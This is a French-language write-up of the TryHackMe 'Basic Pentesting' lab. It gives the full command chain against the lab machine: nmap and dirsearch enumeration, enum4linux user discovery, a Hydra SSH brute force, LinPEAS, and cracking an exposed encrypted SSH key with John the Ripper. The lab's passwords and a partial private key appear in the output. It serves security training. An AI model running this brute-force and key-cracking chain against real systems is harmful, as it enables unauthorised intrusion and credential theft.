Post

TryHackMe - Basic Pentesting

Write-up de la room Basic Pentesting, un challenge easy mettant en pratique l'énumération web, le brute-forcing et l'escalade de privilèges

TryHackMe - Basic Pentesting

Description de la Room

Cette room est un challenge pratique permettant de s’entraîner au pentesting d’applications web et à l’escalade de privilèges sur un système Linux. Elle combine plusieurs techniques fondamentales du pentesting.

Lien : Basic Pentesting

Objectifs d’apprentissage

Cette room couvre les compétences suivantes :

  • Brute-forcing : Attaques par force brute sur SSH
  • Hash cracking : Décryptage de hashes avec John the Ripper
  • Service enumeration : Énumération des services exposés
  • Linux enumeration : Recherche de vecteurs d’escalade de privilèges

Solutions des tâches

Task 1 - Web App Testing and Privilege Escalation

Déploiement et reconnaissance initiale

Deploy the machine and connect to our network

Première étape : vérifier la connectivité avec la machine cible.

1
2
3
4
5
┌──(omnimessie㉿omnimessie)-[~]
└─$ ping 10.10.211.206
PING 10.10.211.206 (10.10.211.206) 56(84) bytes of data.
64 bytes from 10.10.211.206: icmp_seq=1 ttl=63 time=45.2 ms
64 bytes from 10.10.211.206: icmp_seq=2 ttl=63 time=44.8 ms

La machine répond correctement, nous pouvons continuer.


Find the services exposed by the machine

Pour identifier les services exposés, j’ai utilisé Nmap avec les options de scan de service et de scripts par défaut.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(omnimessie㉿omnimessie)-[~]
└─$ nmap -sC -sV 10.10.211.206
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-19 12:46 EDT
Nmap scan report for 10.10.211.206
Host is up (0.11s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 f0:ab:79:20:6e:45:4b:1b:89:27:dc:94:01:6b:ce:6b (RSA)
|   256 e3:50:1c:1c:3e:7f:c4:a1:c5:97:77:50:13:7b:c9:17 (ECDSA)
|_  256 78:34:76:fc:da:5c:14:c3:5e:98:14:fb:e6:6e:e8:37 (ED25519)
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat (language: en)
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 2m03s
| smb2-time: 
|   date: 2025-10-19T16:48:35
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.91 seconds

Services identifiés :

  • Port 22 : SSH (OpenSSH 8.2p1)
  • Port 80 : HTTP (Apache 2.4.41)
  • Port 139/445 : SMB (Samba)
  • Port 8009 : Apache Jserv (AJP13)
  • Port 8080 : Apache Tomcat 9.0.7

La présence de plusieurs services web (ports 80 et 8080) et de Samba suggère plusieurs vecteurs d’attaque possibles.


Énumération web

What is the name of the hidden directory on the web server (enter name without /)?

Pour découvrir les répertoires cachés, j’ai utilisé dirsearch pour fuzzer le serveur web.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(omnimessie㉿omnimessie)-[~]
└─$ dirsearch -u http://10.10.211.206
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/omnimessie/reports/http_10.10.211.206/_25-10-19_12-50-54.txt

Target: http://10.10.211.206/

[12:50:54] Starting:
[12:50:56] 403 -  278B  - /.htaccess.sample
[12:50:56] 403 -  278B  - /.htaccess_sc
[12:50:56] 403 -  278B  - /.htaccess_extra
[12:50:56] 403 -  278B  - /.ht_wsr.txt
[12:50:56] 403 -  278B  - /.htaccess.orig
[12:50:56] 403 -  278B  - /.htaccess_orig
[12:50:56] 403 -  278B  - /.htaccess.bak1
[12:50:56] 403 -  278B  - /.htaccess.save
[12:50:56] 403 -  278B  - /.htaccessBAK
[12:50:56] 403 -  278B  - /.htaccessOLD2
[12:50:56] 403 -  278B  - /.htaccessOLD
[12:50:56] 403 -  278B  - /.html
[12:50:56] 403 -  278B  - /.htm
[12:50:56] 403 -  278B  - /.htpasswd_test
[12:50:56] 403 -  278B  - /.htpasswds
[12:50:56] 403 -  278B  - /.httr-oauth
[12:51:15] 200 -  476B  - /development/
[12:51:34] 403 -  278B  - /server-status/
[12:51:34] 403 -  278B  - /server-status

Task Completed

Le répertoire /development/ est accessible et contient potentiellement des informations intéressantes.

Réponse : development


Analyse du répertoire /development

User brute-forcing to find the username & password

En naviguant vers /development/, j’ai trouvé deux fichiers texte :

Répertoire development

Contenu de dev.txt :

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

Contenu de j.txt :

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Informations extraites :

  • Deux utilisateurs identifiés : J et K
  • L’utilisateur J a un mot de passe faible
  • SMB est configuré sur le serveur
  • Apache Struts 2.5.12 est mentionné

Ces notes de développement révèlent des informations critiques : un utilisateur avec un mot de passe faible et la présence d’un service SMB. C’est un excellent point de départ pour l’énumération.


Énumération SMB

Pour identifier les noms d’utilisateurs complets, j’ai utilisé enum4linux qui énumère les informations SMB.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
┌──(omnimessie㉿omnimessie)-[~]
└─$ enum4linux -a 10.10.211.206
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 19 13:02:01 2025

 =========================================( Target Information )=========================================

Target ........... 10.10.211.206
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===========================( Enumerating Workgroup/Domain on 10.10.211.206 )===========================

[+] Got domain/workgroup name: WORKGROUP

 ===============================( Nbtstat Information for 10.10.211.206 )===============================

Looking up status of 10.10.211.206
        BASIC2          <00> -         B <ACTIVE>  Workstation Service
        BASIC2          <03> -         B <ACTIVE>  Messenger Service
        BASIC2          <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

[... sortie tronquée ...]

 =================================( Share Enumeration on 10.10.211.206 )=================================

        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk      
        IPC$            IPC       IPC Service (Samba Server 4.15.13-Ubuntu)

[+] Attempting to map shares on 10.10.211.206

//10.10.211.206/Anonymous       Mapping: OK Listing: OK Writing: N/A

 ===========================( Password Policy Information for 10.10.211.206 )===========================

[+] Attaching to 10.10.211.206 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):

        [+] BASIC2
        [+] Builtin

[+] Password Info for Domain: BASIC2

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 136 years 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

[... sortie tronquée ...]

 ==================( Users on 10.10.211.206 via RID cycling (RIDS: 500-550,1000-1050) )==================

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)

Utilisateurs identifiés :

  • kay (correspond à “K”)
  • jan (correspond à “J”)
  • ubuntu

Nous savons que jan a un mot de passe faible. C’est notre cible pour le brute-forcing.


Brute-forcing SSH

What is the username?

D’après l’énumération SMB, l’utilisateur avec le mot de passe faible est jan.

Réponse : jan


What is the password?

Pour craquer le mot de passe de jan, j’ai utilisé hydra avec la wordlist rockyou.txt.

Commande Hydra :

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(omnimessie㉿omnimessie)-[~]
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.211.206
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-19 13:15:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.211.206:22/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344112 to do in 830:06h, 15 active
[STATUS] 251.00 tries/min, 753 tries in 00:03h, 14343647 to do in 952:27h, 15 active
[22][ssh] host: 10.10.211.206   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-19 13:18:43

Le mot de passe de jan a été trouvé en quelques minutes : armando

Hydra est extrêmement efficace pour les attaques par force brute, surtout lorsque le mot de passe est dans une wordlist commune comme rockyou.txt.

Réponse : armando


What service do you use to access the server (answer in abbreviation in all caps)?

Nous avons utilisé le service SSH pour nous connecter.

Réponse : SSH


Connexion SSH et énumération initiale

Enumerate the machine to find any vectors for privilege escalation

Connexion SSH avec les credentials découverts :

1
2
3
4
5
6
7
┌──(omnimessie㉿omnimessie)-[~]
└─$ ssh jan@10.10.211.206
jan@10.10.211.206's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-169-generic x86_64)

Last login: Sun Oct 19 17:15:22 2025 from 10.10.43.133
jan@ip-10-10-211-206:~$

Exploration du répertoire personnel :

1
2
3
4
5
jan@ip-10-10-211-206:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 5 root root 4096 Oct 19 12:45 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst

Le répertoire de jan est presque vide. Vérifions les privilèges sudo :

1
2
3
jan@ip-10-10-211-206:~$ sudo -l
[sudo] password for jan: 
Sorry, user jan may not run sudo on ip-10-10-211-206.

Aucun privilège sudo pour jan. Regardons les autres utilisateurs dans /etc/passwd :

1
2
3
4
5
6
7
8
9
10
11
jan@ip-10-10-211-206:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[... utilisateurs système tronqués ...]
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
tomcat9:x:999:999::/home/tomcat9:/bin/false
jan:x:1001:1001::/home/jan:/bin/bash
[... autres utilisateurs tronqués ...]
ubuntu:x:1002:1002:Ubuntu:/home/ubuntu:/bin/bash

L’utilisateur kay semble intéressant. C’est probablement l’utilisateur “K” mentionné dans les notes.


Énumération avec LinPEAS

Pour trouver des vecteurs d’escalade de privilèges, j’ai utilisé LinPEAS, un script d’énumération automatisé.

Téléchargement de LinPEAS :

1
2
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

Attribution des permissions d’exécution :

1
2
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ chmod +x linpeas.sh

Transfert vers la machine cible :

1
2
3
4
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ scp linpeas.sh jan@10.10.211.206:/tmp
jan@10.10.211.206's password: 
linpeas.sh                                           100%  860KB   1.2MB/s   00:00

J’ai placé LinPEAS dans /tmp car c’est un répertoire accessible en écriture par tous les utilisateurs.

Exécution de LinPEAS :

1
2
3
jan@ip-10-10-211-206:~$ cd /tmp
jan@ip-10-10-211-206:/tmp$ chmod +x linpeas.sh
jan@ip-10-10-211-206:/tmp$ ./linpeas.sh

Découverte importante dans la sortie LinPEAS :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)

-rw-r--r-- 1 kay kay 3326 Apr 19  2018 /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
XRvjw/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX
[... clé privée RSA tronquée ...]
-----END RSA PRIVATE KEY-----

-rw-r--r-- 1 kay kay 771 Apr 19  2018 /home/kay/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!

-rw-rw-r-- 1 kay kay 771 Apr 23  2018 /home/kay/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!

Excellent ! LinPEAS a découvert une clé privée SSH pour l’utilisateur kay. Cependant, elle est chiffrée (type ENCRYPTED).


Extraction de la clé privée SSH

J’ai copié la clé privée RSA dans un fichier local :

1
2
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ nano kay_rsa

Tentative de connexion SSH :

1
2
3
4
5
6
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ chmod 600 kay_rsa

┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ ssh -i kay_rsa kay@10.10.211.206
Enter passphrase for key 'kay_rsa':

La clé nécessite une passphrase. Nous devons la craquer.


Cracking de la passphrase SSH

Conversion de la clé SSH au format John :

1
2
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ ssh2john kay_rsa > kay_hash.txt

Cracking avec John the Ripper :

1
2
3
4
5
6
7
8
9
10
11
12
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ john kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_rsa)
1g 0:00:00:00 DONE (2025-10-19 14:07) 11.11g/s 919466p/s 919466c/s 919466C/s betzabeth..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Parfait ! La passphrase de la clé SSH est beeswax.

John the Ripper a cracké la passphrase en quelques secondes. Les clés SSH protégées par des mots de passe faibles peuvent être compromises très rapidement.


Connexion SSH avec la clé de Kay

Connexion avec la clé privée et la passphrase :

1
2
3
4
5
6
7
┌──(omnimessie㉿omnimessie)-[~/Downloads]
└─$ ssh -i kay_rsa kay@10.10.211.206
Enter passphrase for key 'kay_rsa': beeswax
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-169-generic x86_64)

Last login: Sun Oct 19 17:45:12 2025 from 10.10.43.133
kay@ip-10-10-211-206:~$

Nous sommes maintenant connectés en tant que kay !


What is the name of the other user you found (all lower case)?

L’autre utilisateur découvert lors de l’énumération est kay.

Réponse : kay


If you have found another user, what can you do with this information?

Avec les informations trouvées (clé SSH privée chiffrée), nous avons pu :

  1. Extraire la clé privée SSH de kay
  2. Convertir la clé au format John
  3. Craquer la passphrase
  4. Nous connecter en SSH avec l’utilisateur kay

Pas de réponse nécessaire pour cette question.


Découverte du mot de passe final

What is the final password you obtain?

Exploration du répertoire personnel de kay :

1
2
3
4
5
6
7
8
9
10
11
12
13
kay@ip-10-10-211-206:~$ ls -la
total 28
drwxr-xr-x 3 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 5 root root 4096 Oct 19 12:45 ..
-rw------- 1 kay  kay     0 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 19  2018 .ssh
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
-rw-rw-r-- 1 kay  kay    57 Apr 23  2018 pass.bak

kay@ip-10-10-211-206:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Un fichier pass.bak contient le mot de passe final !

Ce fichier de backup contient probablement le nouveau mot de passe fort de kay mentionné dans les notes du répertoire /development/. C’est une mauvaise pratique de sécurité de stocker des mots de passe en clair dans des fichiers.

Réponse : heresareallystrongpasswordthatfollowsthepasswordpolicy$$


Conclusion

Ce challenge met en évidence l’importance d’une énumération approfondie et de la sécurisation des informations d’identification. Une seule faiblesse dans la chaîne de sécurité peut compromettre l’ensemble du système.

Room complétée

This post is licensed under CC BY 4.0 by the author.